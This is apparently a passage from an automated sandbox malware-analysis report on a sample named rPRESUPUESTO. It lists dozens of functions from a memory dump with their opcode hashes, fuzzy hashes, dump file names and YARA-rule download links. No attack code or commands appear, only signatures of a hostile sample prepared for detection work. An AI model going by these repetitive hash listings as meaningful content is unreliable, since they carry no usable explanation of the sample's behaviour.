                                                • Opcode ID: bd64f91f3d99d23ee105904a8833053948f43f7c6bab67c18b0a6ad97405c643
                                                • Instruction ID: eabe7316bb5fffad6b8c724766ff612288dcff2ab17c5739798bfea1d6f539ad
                                                • Opcode Fuzzy Hash: bd64f91f3d99d23ee105904a8833053948f43f7c6bab67c18b0a6ad97405c643
                                                • Instruction Fuzzy Hash: 401139B26183099FC700DF69D44695BBBF8EF98750F00455AB998D7395E630EA10CB92
                                                Function 018A4A80 Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                • Instruction ID: 0181064daa3f3f6c757671e490728b7b2e09f8d8527e2d46cefc975ecbfb90d0
                                                • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                • Instruction Fuzzy Hash: BE01D8322006059FEB25DA5DD854F57BBEAFBC5310F484419E642CB650DAF1F940C754
                                                Function 0185CA11 Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 528cbace33a21e6bf82045c52fb71dad1d839b30163a9b1fc66f67e02631c3bd
                                                • Instruction ID: 11bac4c45f228225b9e8741ce7f881caa42462154c1842fbe31831fce08c0cfc
                                                • Opcode Fuzzy Hash: 528cbace33a21e6bf82045c52fb71dad1d839b30163a9b1fc66f67e02631c3bd
                                                • Instruction Fuzzy Hash: CB1179B26083089FC300DF6DC44194BBBE8FF99350F00851AB998D73A4E630EA00CB92
                                                Function 017EE016 Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                • Instruction ID: 3a163bd6844a73a33556c014afb3ac92a197a573b0c82aa048c083663fddc15d
                                                • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                • Instruction Fuzzy Hash: B9018F326005949FE323871DCA4CF26BBD8EF48758F1908A1F905CB691DA38DE80C621
                                                Function 017C826B Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05b18d3486593bd0b663fe1b63c295cc28957375b28d78b00183ed1debbab8d8
                                                • Instruction ID: baf42ce58501f654f526463a38ce1fc4e192f861992293ba7d14427a3ab26bf9
                                                • Opcode Fuzzy Hash: 05b18d3486593bd0b663fe1b63c295cc28957375b28d78b00183ed1debbab8d8
                                                • Instruction Fuzzy Hash: C70184316045059FD714DB69DD18AAAF7AAEF84B20B15806DDE01EB645DE30DA02C692
                                                Function 0187EB50 Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cb876a096999d69adad3367940d76b689922d5956c28944b099b8f157457650c
                                                • Instruction ID: a989565bb55996fa61c49951d55d5feb686ea3530e7e8b171c0710edd41e77be
                                                • Opcode Fuzzy Hash: cb876a096999d69adad3367940d76b689922d5956c28944b099b8f157457650c
                                                • Instruction Fuzzy Hash: 2001F271240705AFD3315B19D844F12BEE8EF59F50F11882EB706DF3A4D6B0DA418B54
                                                Function 017D2582 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3998f77f580455cdd8344cd9a0ed2ec95c1a191db2e0fc379795981cd8c10f35
                                                • Instruction ID: 9c573ccbcf987e885c49a3dabc303c05827bbc2663e16f26ab08d2b961b37b7d
                                                • Opcode Fuzzy Hash: 3998f77f580455cdd8344cd9a0ed2ec95c1a191db2e0fc379795981cd8c10f35
                                                • Instruction Fuzzy Hash: 08F0F432A41B24B7C7329B5A8C44F57FFF9EB88B90F144068E60697650CA30ED01DAA0
                                                Function 017FC073 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                • Instruction ID: 1e65bc32b947b38d462c35bfb9c52da347a49826fe552fc50d20bfac3fdd6315
                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                • Instruction Fuzzy Hash: C1F0AFB2A00615ABD325CF4D9C40E67FBEADBD5A80F048128A609CB320EA31DD05CB90
                                                Function 017CC310 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                • Instruction ID: 78d544aeaf8cbd74721e2484c41112b191f4239438ca2b24de15ae385253299f
                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                • Instruction Fuzzy Hash: A9F0C233204A239BD73356599844B2BEE958FD5F64F1A007EF30E9B248CA648D0297D2
                                                Function 018A634F Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dbd68e15921d7f231e40a7b19e28ddce09ebb31519deb5602cb3e1c64923c152
                                                • Instruction ID: 76c2e0b507b5b1c0d78936ca6d90e63508ae06528cdb939620383f5decbf7a76
                                                • Opcode Fuzzy Hash: dbd68e15921d7f231e40a7b19e28ddce09ebb31519deb5602cb3e1c64923c152
                                                • Instruction Fuzzy Hash: 3D012C72A1020DAFDB04DFA9D955AAEB7F8FF58304F14406AE904E7354D6749A01CBA1
                                                Function 018A62D6 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c80a6ec2128d6b4b4a48349f421f99b3c16bc5eb35877404f3fe05f638e03d6
                                                • Instruction ID: 2b0fc5a3c6212413612fd13a342f85e05c3ef863d032a0bbc3eb6ab2433a1bf3
                                                • Opcode Fuzzy Hash: 6c80a6ec2128d6b4b4a48349f421f99b3c16bc5eb35877404f3fe05f638e03d6
                                                • Instruction Fuzzy Hash: C9014FB1A0020DEFDB04DFA9D545AAEBBF8FF58304F54406AF914E7394D6749E018BA1
                                                Function 018A625D Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 877696b54d2370ae37f5d51ad2a301543f9c9e8ea7f435599da0f367ad507512
                                                • Instruction ID: 5039577f1b836ba70f1f8e872f60b0ef0a488bf7216d94ad84cc24dab6f7b706
                                                • Opcode Fuzzy Hash: 877696b54d2370ae37f5d51ad2a301543f9c9e8ea7f435599da0f367ad507512
                                                • Instruction Fuzzy Hash: A2017C71A0020EAFDB04DFA9D441AAEB7F8EF58304F14406AF900E7394D674AA00CBA0
                                                Function 0180CA6F Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                • Instruction ID: a64f219370cfa29a260c7e77ed8ca07a034c997f20d89a68288c7d4e4a1d6cee
                                                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                • Instruction Fuzzy Hash: E501F43260168D9BD363DB6DC849F59BBD8EF42758F0841E5FA04DB6A1DB79CA80C211
                                                Function 018A61E5 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8f5e48e38e0391205d268cbe4d051a2dcc08de1dbdd8845a43657281a0bb7fc
                                                • Instruction ID: a04e7c1f81280fe3b27ad96d73cbaf9006e1f109cd7a7cb7faa6c8c200d08879
                                                • Opcode Fuzzy Hash: d8f5e48e38e0391205d268cbe4d051a2dcc08de1dbdd8845a43657281a0bb7fc
                                                • Instruction Fuzzy Hash: AF014F71A0024D9FDB04DFA9D545AEEBBF8BF58314F14405AE901E7284E774EB01CB95
                                                Function 018563C0 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                • Instruction ID: 184c69d842685d894baef0e6ce03212fdc124665cf79daf6be7b5b4040b3c18d
                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                • Instruction Fuzzy Hash: 24F0127210001DBFEF019F94DD80DAF7BBDFB593D8B104125FA1192160D631DE21A7A0
                                                Function 0185A4B0 Relevance: .0, Instructions: 40COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: efb4c5b931919e4d7af6ecc68ad063f05627f23249d76d758deb7a1896fef90b
                                                • Instruction ID: 7349ac58b928ddfd406587af81ffa6a82085d66e22fc4fefbb3902a50d7d3fd3
                                                • Opcode Fuzzy Hash: efb4c5b931919e4d7af6ecc68ad063f05627f23249d76d758deb7a1896fef90b
                                                • Instruction Fuzzy Hash: 7B018936100109AFCF129E88D880EDA3F66FB4C758F058201FE18A6220C336DA70EF81
                                                Function 017CC0F0 Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d67f54f3039d7b7271c7dd69a5c8041fc4819713be74e3848d9e4c0020b3bd60
                                                • Instruction ID: fbce810390d1a001aed6675df55635bde0e5d78c69da2eef16440d01a4d10d9d
                                                • Opcode Fuzzy Hash: d67f54f3039d7b7271c7dd69a5c8041fc4819713be74e3848d9e4c0020b3bd60
                                                • Instruction Fuzzy Hash: BAF024B13082415FF31A961E8C01B32B29AE7C0B50F7980BEEB0D8B2C1F971DC0183A4
                                                Function 0180656A Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7794b3c0a7ef1c96ca25029bff786bc32d902b4cd3a7a6ac84c22467f26187bc
                                                • Instruction ID: 7524e222c0e6d56fe1682996584c3c52b07a0eaf49e344efc07a25b615513cf9
                                                • Opcode Fuzzy Hash: 7794b3c0a7ef1c96ca25029bff786bc32d902b4cd3a7a6ac84c22467f26187bc
                                                • Instruction Fuzzy Hash: 9D018C7020168D9FE7639B6CCD48F2537E8BF44B04F5801A4BA11DBADAEB29D6418610
                                                Function 0187437C Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                • Instruction ID: 8e6739e3a850f605825cd0e88e45c3c1ac49b7648b3f378fdd83d07c7b2dcd61
                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                • Instruction Fuzzy Hash: 78F08235341E1347EB76BA2E9824F3BAA95AF90B50B05053D9659CB6C0DF60DE018790
                                                Function 0185C89D Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0cf4b20e837b23e62d7f941a5cceeafcdd689831ab7e837efa82f4bf657cd276
                                                • Instruction ID: 9fe69ade2f966480b1f926e466695206f618d4a4b961044f1dc2670eab81ffa0
                                                • Opcode Fuzzy Hash: 0cf4b20e837b23e62d7f941a5cceeafcdd689831ab7e837efa82f4bf657cd276
                                                • Instruction Fuzzy Hash: C1F0AF716057089FC310EF28C546A1AB7E8FF98714F40465ABC98DB394E634EA00CB96
                                                Function 0185E872 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                • Instruction ID: 57f89b775329823cfdfe5e19f15e1b1a39e9bd48d777e7d28566020157c99a3a
                                                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                • Instruction Fuzzy Hash: 46F05E327156229BE3719A4ECC80F16F7A8EFD9B60F190465AE15DB664C760EE028BD0
                                                Function 01800854 Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                • Instruction ID: 3c16c0e2e90f0d222f4298ce419f2cd447bf7cb03a235d28f269a67c98a42dbd
                                                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                • Instruction Fuzzy Hash: FBF09072614208AEF715DB25CC05F56B6E9EF99344F148068A945D71A4FAB0DF01C654
                                                Function 0185C912 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c96fe5bac0202941f6123fafa6b5623aa5ceb250977697b99df99777758c9481
                                                • Instruction ID: 58c1f0237d0512b8f10ff50087ca92e46bb0f7cb06dd39e3a221c5fe6a4af7ca
                                                • Opcode Fuzzy Hash: c96fe5bac0202941f6123fafa6b5623aa5ceb250977697b99df99777758c9481
                                                • Instruction Fuzzy Hash: 4DF04F71A0124D9FCB04EF69C515A5EB7F8EF18304F008055A955EB385DA38EB01CB51
                                                Function 017D47FB Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4076cd53b43c8e1df455cdd7d1f07c9556623ff5169705afb727400897aac2e9
                                                • Instruction ID: 386fa67552c9baafec5128fc799fb3ccde4d3132dee684382822a28999677afa
                                                • Opcode Fuzzy Hash: 4076cd53b43c8e1df455cdd7d1f07c9556623ff5169705afb727400897aac2e9
                                                • Instruction Fuzzy Hash: ADF090319966E99FE7228B5CC04AB22FBE49B006A0F48496AD54BC7912C774D880C651
                                                Function 01890115 Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 236ef04c3a6b82dce3f32929821f9c62d0723be620848ad30730ca9808b33033
                                                • Instruction ID: 71e14b5ea7d4651284cf57b4219119db896a17748569c74a60a3dd2e6c165512
                                                • Opcode Fuzzy Hash: 236ef04c3a6b82dce3f32929821f9c62d0723be620848ad30730ca9808b33033
                                                • Instruction Fuzzy Hash: 48F020A641AE804ECF326B2C68902D13F69A742710F2D1099E9A0E7306DA74CB87CB21
                                                Function 0180C5ED Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2615d1230e08c86059ed7d9636e406e083dc106fd0fdfaf2244e20a760afbf3
                                                • Instruction ID: 49de37d5aed88a287fe3fbbc1cee95f3aded87643b531eeb8ab8d14c7f3579f6
                                                • Opcode Fuzzy Hash: e2615d1230e08c86059ed7d9636e406e083dc106fd0fdfaf2244e20a760afbf3
                                                • Instruction Fuzzy Hash: 8FF052714026489FE3B38F9CCC08B11BBE49B007A4F0C97ADD822C3192C360FA80CA50
                                                Function 01812619 Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                • Instruction ID: 69a83d9bc6825c6a77a5ba7e162609053c221693a44a499a9a255ee223d4a7ac
                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                • Instruction Fuzzy Hash: 2CE092323006016BE7119E5D8C84F5777AE9F96B14F140479B5049E295C9E29D0986A4
                                                Function 01866030 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                • Instruction ID: b1b7622dcd3835e327dc32fcdb7f5e2f9a5c5036b67436b15819bba1f49f19af
                                                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                • Instruction Fuzzy Hash: 3DF01C72104248AFE3218F09D944F52BBFCEB15368F65C025E609EB561E379ED40CBA5
                                                Function 017D0710 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                • Instruction ID: b9f1bf45bbc2d0c90a34cdf0b3bfe01c99547dbdd915583e1831543e3ec7847a
                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                • Instruction Fuzzy Hash: 18F0ED3A2043599BEF1ADF19C040AA5BBF8FB45360F010094FC528F351EB31EA82CB94
                                                Function 018049D0 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                • Instruction ID: d89ea34dc79ddf4bc3dfad93df9562ff4cab8c0253735b07e8a9083c0a44a670
                                                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                • Instruction Fuzzy Hash: 4EE0D83238414DABD7632A598C04B6677E5DBD47A0F150429E700CB1D1DB74DDC0D7D8
                                                Function 018A4164 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48c86cfc4ef33f3f17289da223b1ab61a8afc6fe495cc74c6740d078b55d4b6d
                                                • Instruction ID: 047561d4c02c1e82c8d1446a6d4a86fb0a48b137173db7a590c36dccf59f68eb
                                                • Opcode Fuzzy Hash: 48c86cfc4ef33f3f17289da223b1ab61a8afc6fe495cc74c6740d078b55d4b6d
                                                • Instruction Fuzzy Hash: BEF0A031A25D914FFB62D72CD144B5177E0AB10730FCE05A4D411C7912C3A0ED40C650
                                                Function 0187678E Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                • Instruction ID: 694da44324641560ed6cbc5073f1309db07e3fca9ce10a7ac99486a271f31c12
                                                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                • Instruction Fuzzy Hash: B1E0DF32A40514BBEB22A7998D06F9ABEADDB94FE0F150054BA00EB0D0E530DF04D690
                                                Function 018A08C0 Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                • Instruction ID: f518265a0f72138434f7344b8808bf7ff10554f323b912ac4c8791e827f60e62
                                                • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                • Instruction Fuzzy Hash: FAE09B316403548BDB258A1EC540A73B7E8DFA5764F55806DE90587712C271F942C6D4
                                                Function 017D25E0 Relevance: .0, Instructions: 23COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
